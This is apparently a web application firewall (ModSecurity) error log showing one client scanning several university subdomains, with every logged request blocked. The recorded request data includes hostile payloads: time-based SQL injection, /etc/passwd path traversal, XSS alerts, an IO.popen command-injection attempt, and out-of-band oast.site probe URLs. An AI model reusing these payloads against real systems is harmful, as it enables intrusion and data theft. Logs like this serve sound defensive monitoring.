[Tue Aug 29 11:44:08.441951 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:id: 1' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/admin/"] [unique_id "ZO13mMCo-f0AAAdQ3pAAAAAV"]
[Tue Aug 29 11:44:08.442987 2023] [:error] [pid 1990] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:id: 1' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/admin/"] [unique_id "ZO13mMCo-f0AAAfGabYAAAAT"]
[Tue Aug 29 11:44:08.450960 2023] [:error] [pid 1943] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:id: 1' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/admin/"] [unique_id "ZO13mMCo-f0AAAeX1McAAAAK"]
[Tue Aug 29 11:44:09.443476 2023] [:error] [pid 1959] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:defaultlanguage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:defaultlanguage: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/pages/setup.php"] [unique_id "ZO13mcCo-f0AAAenGegAAAAM"]
[Tue Aug 29 11:44:09.600338 2023] [:error] [pid 2019] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:id: 1' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/admin/"] [unique_id "ZO13mcCo-f0AAAfjGOkAAAAh"]
[Tue Aug 29 11:44:10.389477 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x5c\\x22>< found within ARGS:email: test@gmail.com'\\x5c\\x22><svg/onload=alert(/xss/)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/email/unsubscribed"] [unique_id "ZO13msCo-f0AAAc4EwAAAAAP"]
[Tue Aug 29 11:44:10.508671 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x5c\\x22>< found within ARGS:email: test@gmail.com'\\x5c\\x22><svg/onload=alert(/xss/)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/email/unsubscribed"] [unique_id "ZO13msCo-f0AAAc4EwQAAAAP"]
[Tue Aug 29 11:44:10.640607 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x5c\\x22>< found within ARGS:email: test@gmail.com'\\x5c\\x22><svg/onload=alert(/xss/)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/email/unsubscribed"] [unique_id "ZO13msCo-f0AAAcvBrQAAAAJ"]
[Tue Aug 29 11:44:10.651040 2023] [:error] [pid 1875] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x5c\\x22>< found within ARGS:email: test@gmail.com'\\x5c\\x22><svg/onload=alert(/xss/)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/email/unsubscribed"] [unique_id "ZO13msCo-f0AAAdTBKUAAAAY"]
[Tue Aug 29 11:44:10.677260 2023] [:error] [pid 1943] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x5c\\x22>< found within ARGS:email: test@gmail.com'\\x5c\\x22><svg/onload=alert(/xss/)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/email/unsubscribed"] [unique_id "ZO13msCo-f0AAAeX1MsAAAAK"]
[Tue Aug 29 11:44:11.416565 2023] [:error] [pid 2012] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x5c\\x22>< found within ARGS:email: test@gmail.com'\\x5c\\x22><svg/onload=alert(/xss/)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/email/unsubscribed"] [unique_id "ZO13m8Co-f0AAAfcoOkAAAAa"]
[Tue Aug 29 11:44:13.364864 2023] [:error] [pid 1886] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:IO.popen('cat /etc/passwd').read\\n#. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:IO.popen('cat /etc/passwd').read\\x5cn#: io.popen(cat/etc/passwd).read #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO13ncCo-f0AAAdeQ-IAAAAQ"]
[Tue Aug 29 11:44:13.411519 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:IO.popen('cat /etc/passwd').read\\n#. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:IO.popen('cat /etc/passwd').read\\x5cn#: io.popen(cat/etc/passwd).read #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO13ncCo-f0AAAdOeZAAAAAS"]
[Tue Aug 29 11:44:13.411833 2023] [:error] [pid 1887] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:IO.popen('cat /etc/passwd').read\\n#. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:IO.popen('cat /etc/passwd').read\\x5cn#: io.popen(cat/etc/passwd).read #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO13ncCo-f0AAAdftewAAAAG"]
[Tue Aug 29 11:44:13.418511 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:IO.popen('cat /etc/passwd').read\\n#. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:IO.popen('cat /etc/passwd').read\\x5cn#: io.popen(cat/etc/passwd).read #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO13ncCo-f0AAAcsLRMAAAAE"]
[Tue Aug 29 11:44:13.440345 2023] [:error] [pid 2012] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:IO.popen('cat /etc/passwd').read\\n#. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:IO.popen('cat /etc/passwd').read\\x5cn#: io.popen(cat/etc/passwd).read #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO13ncCo-f0AAAfcoPIAAAAa"]
[Tue Aug 29 11:44:14.385540 2023] [:error] [pid 2029] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:username: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13nsCo-f0AAAftVDUAAAAf"]
[Tue Aug 29 11:44:14.387536 2023] [:error] [pid 2041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:username: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13nsCo-f0AAAf53SkAAAAR"]
[Tue Aug 29 11:44:14.405450 2023] [:error] [pid 2029] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:IO.popen('cat /etc/passwd').read\\n#. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:IO.popen('cat /etc/passwd').read\\x5cn#: io.popen(cat/etc/passwd).read #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO13nsCo-f0AAAftVDYAAAAf"]
[Tue Aug 29 11:44:14.419566 2023] [:error] [pid 1887] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:username: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13nsCo-f0AAAdftfEAAAAG"]
[Tue Aug 29 11:44:14.435062 2023] [:error] [pid 1875] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:username: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO13nsCo-f0AAAdTBK8AAAAY"]
[Tue Aug 29 11:44:14.440636 2023] [:error] [pid 1959] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:username: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13nsCo-f0AAAenGfAAAAAM"]
[Tue Aug 29 11:44:15.477690 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:username: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13n8Co-f0AAAcsLRwAAAAE"]
[Tue Aug 29 11:44:16.363427 2023] [:error] [pid 1887] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmnbitjmimt14dgn26gwhzi3s1hw99r1.oast.site found within TX:1: cjmnbitjmimt14dgn26gwhzi3s1hw99r1.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/idp/profile/oidc/authorize"] [unique_id "ZO13oMCo-f0AAAdftfgAAAAG"]
[Tue Aug 29 11:44:16.413643 2023] [:error] [pid 2020] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmnbitjmimt14dgn26g7m7dyhd8hgcea.oast.site found within TX:1: cjmnbitjmimt14dgn26g7m7dyhd8hgcea.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/idp/profile/oidc/authorize"] [unique_id "ZO13oMCo-f0AAAfky-MAAAAi"]
[Tue Aug 29 11:44:16.429714 2023] [:error] [pid 1887] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmnbitjmimt14dgn26gs4wgiowfckdd7.oast.site found within TX:1: cjmnbitjmimt14dgn26gs4wgiowfckdd7.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/idp/profile/oidc/authorize"] [unique_id "ZO13oMCo-f0AAAdftfsAAAAG"]
[Tue Aug 29 11:44:16.451969 2023] [:error] [pid 1959] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmnbitjmimt14dgn26ggftjm7d91k5wn.oast.site found within TX:1: cjmnbitjmimt14dgn26ggftjm7d91k5wn.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/idp/profile/oidc/authorize"] [unique_id "ZO13oMCo-f0AAAenGfoAAAAM"]
[Tue Aug 29 11:44:16.547703 2023] [:error] [pid 1875] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmnbitjmimt14dgn26gox7q86jbfo8n9.oast.site found within TX:1: cjmnbitjmimt14dgn26gox7q86jbfo8n9.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/idp/profile/oidc/authorize"] [unique_id "ZO13oMCo-f0AAAdTBLsAAAAY"]
[Tue Aug 29 11:44:17.478663 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmnbitjmimt14dgn26gpgednr58bnn9f.oast.site found within TX:1: cjmnbitjmimt14dgn26gpgednr58bnn9f.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/idp/profile/oidc/authorize"] [unique_id "ZO13ocCo-f0AAAdxUdYAAAAC"]
[Tue Aug 29 11:44:18.406916 2023] [:error] [pid 2005] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:fileName: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/api/downloads"] [unique_id "ZO13osCo-f0AAAfVkZgAAAAD"]
